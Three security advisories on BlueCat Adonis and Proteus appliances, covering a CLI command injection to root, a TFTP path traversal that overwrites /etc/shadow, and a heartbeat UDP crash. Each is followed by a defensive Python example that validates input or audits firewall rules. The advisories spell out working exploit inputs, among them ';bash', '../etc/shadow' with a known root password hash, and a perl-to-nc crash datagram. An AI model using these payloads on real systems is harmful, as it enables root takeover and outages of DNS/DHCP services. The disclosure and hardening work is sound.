TS-2007-003-0: BlueCat Networks Adonis CLI root privilege escalation
Template Security Security Advisory
---
BlueCat Networks Adonis CLI root privilege escalation

Date: 2007-08-16
Advisory ID: TS-2007-003-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0

Contents
  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary
---
Template Security has discovered a root privilege escalation vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance which allows the admin user to gain root privilege from the Command Line Interface (CLI).

Software Version
---
Adonis version 5.0.2.8 was tested.

Details
---
The admin account on the Adonis DNS/DHCP appliance provides access to a CLI that allows an administrator to perform tasks such as setting the IP address, netmask, system time and system hostname. By entering a certain command sequence, the administrator is able to execute a command as root.

Impact
---
Access to the admin account is the same as root access on the appliance.

Exploit
---
Here we use the 'set host-name' CLI command to execute a root shell:

:adonis> set host-name ;bash
adonis.katter.org
[EMAIL PROTECTED]:~# id
uid=0(root) gid=0(root) groups=0(root)

NOTE: There may be other command sequences that accomplish the same result.

Workarounds
---
Only provide admin account access to administrators that also have root account access on the appliance.

Obtaining Patched Software
---
Contact the vendor.

Credits
---
forloop discovered this vulnerability while enjoying a Tuborg Gold. forloop is a member of Template Security.

Revision History
---
2007-08-16: Revision 0 released
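The advisory shows a CLI argument that ends up being interpreted by a shell. As an added illustration, not code from the advisory or from BlueCat, the following Python contrasts the pattern that produces this class of bug, splicing the user's value into a command string that a shell later parses, with a hardened handler that validates the host name against RFC 1123 syntax and passes it as a separate argv element with no shell at all. The advisory does not describe the Adonis CLI internals, so the unsafe builder is an assumed, typical cause rather than the appliance's code; the `hostname` program and the sample inputs are likewise assumptions for the example.

```python
import re
import subprocess
from typing import List

# RFC 1123 host name: labels of letters, digits and hyphens that neither start
# nor end with a hyphen, joined by dots; at most 253 characters overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(r"^" + _LABEL + r"(?:\." + _LABEL + r")*$")


def build_command_unsafe(name: str) -> str:
    """Assumed bug pattern (not the appliance's code): the CLI argument is
    concatenated into a command string that a shell later parses, so a ';'
    ends 'hostname' and starts a second command. Returned as a string here,
    never executed."""
    return "hostname " + name


def validate_hostname(name: str) -> str:
    """Accept only a syntactically valid host name; everything else (shell
    metacharacters, whitespace, empty input, over-long names) is rejected
    before it gets anywhere near a command."""
    if not name or len(name) > 253 or HOSTNAME_RE.match(name) is None:
        raise ValueError("invalid host name: %r" % (name,))
    return name


def build_command_safe(name: str) -> List[str]:
    """The validated value as its own argv element. No shell is involved, so
    no character in the input can change which program runs."""
    return ["hostname", validate_hostname(name)]


def set_hostname(name: str, dry_run: bool = True) -> List[str]:
    """Validate, then run 'hostname <name>' without a shell. dry_run=True
    (the default) only returns the argv, so the function is safe to call on
    a workstation."""
    argv = build_command_safe(name)
    if not dry_run:
        subprocess.run(argv, check=True)  # list argv; shell stays False
    return argv


if __name__ == "__main__":
    # Constructed inputs: the advisory's injection value plus ordinary names.
    for candidate in [";bash", "adonis.katter.org", "bad name", "-leading"]:
        print("unsafe command string:", repr(build_command_unsafe(candidate)))
        try:
            print("hardened argv:       ", set_hostname(candidate))
        except ValueError as exc:
            print("rejected:            ", exc)
```

The validation is a whitelist, not a blacklist of metacharacters: a CLI that only ever needs to accept host names has no reason to let anything else through, and the argv form means the check is defence in depth rather than the only barrier.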
TS-2007-002-0: BlueCat Networks Adonis root Privilege Access
Template Security Security Advisory
---
BlueCat Networks Adonis root Privilege Access

Date: 2007-08-06
Advisory ID: TS-2007-002-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0

Contents
  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary
---
Template Security has discovered a serious user input validation vulnerability in the BlueCat Networks Proteus IPAM appliance. Proteus can be used to upload files to managed Adonis appliances so that they can be downloaded by TFTP from the appliance. A Proteus administrator with privilege to add TFTP files and perform TFTP deployments can overwrite existing files and create new files as root on the Adonis DNS/DHCP appliance. This can be used, for example, to overwrite the system password database and change the root account password.

Software Version
---
Proteus version 2.0.2.0 and Adonis version 5.0.2.8 were tested.

Details
---
Proteus allows TFTP files to be named by an administrator, and no validation is performed on that user input, so names containing relative path components are accepted. Files are supposed to be copied only to the /tftpboot/ directory, and the file copy is performed with root privilege. This means, for example, that a file named ../etc/shadow will overwrite the shadow password database /etc/shadow.

Impact
---
Successful exploitation of the vulnerability will result in root access on the Adonis appliance.

Exploit
---
0) Create a new TFTP Group in a Proteus configuration.

1) Add a TFTP deployment role specifying an Adonis appliance to the group.

2) At the top-level folder in the new TFTP group, add a file named "../etc/shadow" (without the quotes) and load a file containing the following line:

root:Im0Zgl8tnEq9Y:13637:0:9:7:::

NOTE: The sshd configuration uses the default setting 'PermitEmptyPasswords no', so we specify a password of bluecat.

3) Deploy the configuration to the Adonis appliance.

4) You can now log in to the Adonis appliance as root with password bluecat.

$ ssh [EMAIL PROTECTED]
[EMAIL PROTECTED]'s password:
# cat /etc/shadow
root:Im0Zgl8tnEq9Y:13637:0:9:7:::

NOTE: This example assumes SSH is enabled, iptables permits port tcp/22, etc. Many attack variations are possible, such as changing system startup scripts to modify the iptables configuration on the appliance.

Workarounds
---
The attack can be prevented by creating an access right override at the configuration level to disable TFTP access for each administrator.

Obtaining Patched Software
---
Contact the vendor.

Credits
---
defaultroute discovered this vulnerability while performing a security review of the Proteus IPAM appliance (a discovery fueled by Red Bull and techno). defaultroute is a member of Template Security.

Revision History
---
2007-08-06: Revision 0 released
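The defect above is a path traversal: a user-supplied TFTP file name is joined onto /tftpboot/ and written as root without being normalized and checked. As an added example, not code from the advisory or from BlueCat, the following Python shows the containment check the copy routine needs: normalize the joined path and refuse any result that does not stay under the TFTP root. Only the /tftpboot directory name comes from the advisory; the function and the sample file names are constructed for illustration.

```python
import posixpath

TFTP_ROOT = "/tftpboot"  # the directory the advisory says files belong in


def resolve_tftp_path(user_name, root=TFTP_ROOT):
    """Map a user-supplied TFTP file name to its destination path, raising
    ValueError when the result would lie outside the TFTP root.

    The check is lexical (posixpath) so it runs anywhere. On a real system
    the same prefix test should be repeated on os.path.realpath() of the
    result, so that a symlink inside the root cannot redirect the write."""
    if not user_name or "\x00" in user_name:
        raise ValueError("empty or NUL-containing file name")
    root = posixpath.normpath(root)
    # join() discards the root when user_name is absolute ("/etc/shadow");
    # normpath() collapses ".." segments ("../etc/shadow" -> "/etc/shadow").
    # Either way a traversal yields a path no longer prefixed by the root.
    candidate = posixpath.normpath(posixpath.join(root, user_name))
    if candidate == root or not candidate.startswith(root + "/"):
        raise ValueError("file name escapes %s: %r -> %s" % (root, user_name, candidate))
    return candidate


def classify(names, root=TFTP_ROOT):
    """Return {name: destination or 'REJECTED'} for a batch of names; useful
    for auditing the entries already configured in a TFTP group."""
    result = {}
    for name in names:
        try:
            result[name] = resolve_tftp_path(name, root)
        except ValueError:
            result[name] = "REJECTED"
    return result


if __name__ == "__main__":
    # Constructed inputs: the advisory's traversal name, variants of it, and
    # ordinary boot file names that should be accepted.
    samples = ["../etc/shadow", "/etc/shadow", "boot/../../etc/passwd", "..",
               "pxelinux.0", "cfg/default", "boot/../pxelinux.0"]
    for name, dest in classify(samples).items():
        print("%-26r -> %s" % (name, dest))
```

Rejecting, rather than silently stripping, the offending components is deliberate: a name like ../etc/shadow in an IPAM configuration is never a typo, and a hard error leaves an audit trail where a sanitized write would not.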
TS-2007-001-0: BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability
Template Security Security Advisory
---
BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

Date: 2007-07-29
Advisory ID: TS-2007-001-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0

Contents
  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary
---
Template Security has discovered a serious Denial of Service (DoS) vulnerability in the BlueCat Networks Adonis DNS/DHCP Appliance. When XHA is configured to place two Adonis servers in an active-passive pair to provide high availability, a remote attacker can transmit a single UDP datagram to crash the heartbeat control process. This can be used, for example, to create an active/active condition in the cluster pair.

Software Version
---
Adonis version 5.0.2.8 was tested, and XHA was configured using the Proteus IPAM appliance. It is possible that any version of Adonis using heartbeat version 1.2.4 or earlier is vulnerable.

Details
---
XHA on Adonis uses the heartbeat software from the Linux-HA project (http://www.linux-ha.org/). On the version of Adonis we tested, heartbeat version 1.2.3 is used. This version is vulnerable to a well-known remote DoS attack which was announced on 2006-08-13:

http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt

Impact
---
Successful exploitation of the vulnerability will result in a DoS condition affecting critical DNS and DHCP services.

Exploit
---
In this example the XHA cluster is composed of:

node-1: 192.168.1.12
node-2: 192.168.1.13
VIP:    192.168.1.11

A remote attacker can perform the following to crash the heartbeat control process on node-1:

$ perl -e 'print ###\n2147483647heart attack:%%%\n' | nc -u 192.168.1.12 694

If node-1 is the active node in the cluster, node-2 will take over the VIP and the cluster will be in an active/active condition. Other scenarios are possible, such as crashing the control process on the passive node to prevent it from being able to assume the active role in a failure condition.

Note that the iptables configuration on Adonis does not block packets to 694/udp; there is an explicit policy to permit port 694/udp from any to any in the INPUT and OUTPUT chains. To verify this, you can log in as root on the appliance and view the firewall configuration script:

# grep 694 /usr/local/bluecat/doFirewall
iptables -A INPUT -p udp --dport 694 -j ACCEPT
iptables -A OUTPUT -p udp --dport 694 -j ACCEPT
$IP6TABLES -A INPUT -p udp --dport 694 -j ACCEPT
$IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT

Workarounds
---
The attack can be prevented by blocking packets to 694/udp. This can be done at a firewall and by modifying the iptables configuration on the Adonis appliances. Appropriate anti-spoofing policies must also be in place, because an attacker can spoof the source IP address in the UDP datagram.

When XHA was configured, iptables rules were written to /usr/local/bluecat/firewall_rules/localHAFirewallConfig to permit 694/udp to and from the peer node on each appliance. However, these rules have no effect, because the blanket rules shown above already accept the traffic, and they are also incorrect: they match source port 694/udp, while the heartbeat packets we observed do not use a fixed source port.

One possible workaround that may be used to temporarily prevent the attack is to comment out the 694/udp rules in the firewall startup script and then repair the rules in localHAFirewallConfig. However, localHAFirewallConfig can be overwritten by /usr/local/bluecat/configLocalFirewall.sh. For this reason we recommend that customers do not modify the iptables configuration, and instead block 694/udp and perform anti-spoofing at a firewall.

Obtaining Patched Software
---
Contact the vendor.

Credits
---
forloop discovered that Adonis XHA was using vulnerable heartbeat software, and defaultroute read the heartbeat code to discover the exploit. Both are members of Template Security.

Revision History
---
2007-07-29: Revision 0 released
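The workaround section rests on three facts about the firewall script: the blanket rules in doFirewall accept 694/udp from any source, the peer rules in localHAFirewallConfig come too late to matter, and those peer rules key on a source port that heartbeat does not fix. As an added example, not part of the advisory or the appliance, the following Python audits iptables rule lines for exactly those problems and shows the shape of a rule that restricts the heartbeat port to the peer node by address and destination port only. The rule lines are constructed from the advisory's grep output and its node addresses; the peer-restricted rule is an illustration of the intended policy, not a vendor-supplied rule, and the evaluation order of the sample is an assumption consistent with the advisory's description.

```python
import shlex

HEARTBEAT_PORT = "694"

# Constructed sample, in assumed evaluation order: the four lines the
# advisory's grep shows in doFirewall, then a peer rule of the incorrect
# shape the advisory describes for localHAFirewallConfig (source port 694),
# then a corrected peer rule that keys on peer address and destination port
# only. 192.168.1.13 is the advisory's node-2, as seen from node-1.
SAMPLE_RULES = [
    "iptables -A INPUT -p udp --dport 694 -j ACCEPT",
    "iptables -A OUTPUT -p udp --dport 694 -j ACCEPT",
    "$IP6TABLES -A INPUT -p udp --dport 694 -j ACCEPT",
    "$IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT",
    "iptables -A INPUT -p udp -s 192.168.1.13 --sport 694 --dport 694 -j ACCEPT",
    "iptables -A INPUT -p udp -s 192.168.1.13 --dport 694 -j ACCEPT",
]


def parse_rule(line):
    """Split one iptables command line into {option: value}; an option with
    no value maps to True, and the program name is stored under '_prog'."""
    tokens = shlex.split(line)
    opts = {"_prog": tokens[0]}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("-")
        if tok.startswith("-") and has_value:
            opts[tok] = tokens[i + 1]
            i += 2
        else:
            opts[tok] = True
            i += 1
    return opts


def is_heartbeat_input_accept(opts):
    """True for an INPUT rule that accepts UDP to the heartbeat port."""
    return (opts.get("-A") == "INPUT" and opts.get("-p") == "udp"
            and opts.get("--dport") == HEARTBEAT_PORT and opts.get("-j") == "ACCEPT")


def audit_rule(opts, peers):
    """Findings for one parsed rule; an empty list means acceptable.
    peers is the set of addresses allowed to send heartbeat datagrams."""
    findings = []
    if not is_heartbeat_input_accept(opts):
        return findings
    src = opts.get("-s")
    if src is None:
        findings.append("accepts %s/udp from any source" % HEARTBEAT_PORT)
    elif src not in peers:
        findings.append("accepts %s/udp from non-peer %s" % (HEARTBEAT_PORT, src))
    if "--sport" in opts:
        findings.append("matches source port %s, but heartbeat does not use a fixed source port"
                        % opts["--sport"])
    return findings


def audit(rules, peers):
    """Audit rule lines in evaluation order. Besides per-rule findings, a
    peer-restricted iptables INPUT rule that follows an unrestricted one is
    reported as shadowed: the earlier rule has already accepted the datagram,
    which is why the advisory says the localHAFirewallConfig rules have no
    effect."""
    report = {}
    unrestricted_seen = False
    for rule in rules:
        opts = parse_rule(rule)
        findings = audit_rule(opts, peers)
        if opts["_prog"] == "iptables" and is_heartbeat_input_accept(opts):
            if "-s" not in opts:
                unrestricted_seen = True
            elif unrestricted_seen:
                findings.append("shadowed by an earlier rule that accepts %s/udp from any source"
                                % HEARTBEAT_PORT)
        report[rule] = findings
    return report


if __name__ == "__main__":
    for rule, findings in audit(SAMPLE_RULES, {"192.168.1.13"}).items():
        print(rule)
        for finding in findings or ["ok"]:
            print("    " + finding)
```

The corrected peer rule is only as strong as the anti-spoofing in front of it, as the advisory notes: a source-address match on the appliance does nothing against a datagram whose source was forged upstream, so the filter at the network edge remains the primary control and the local rule is a second layer.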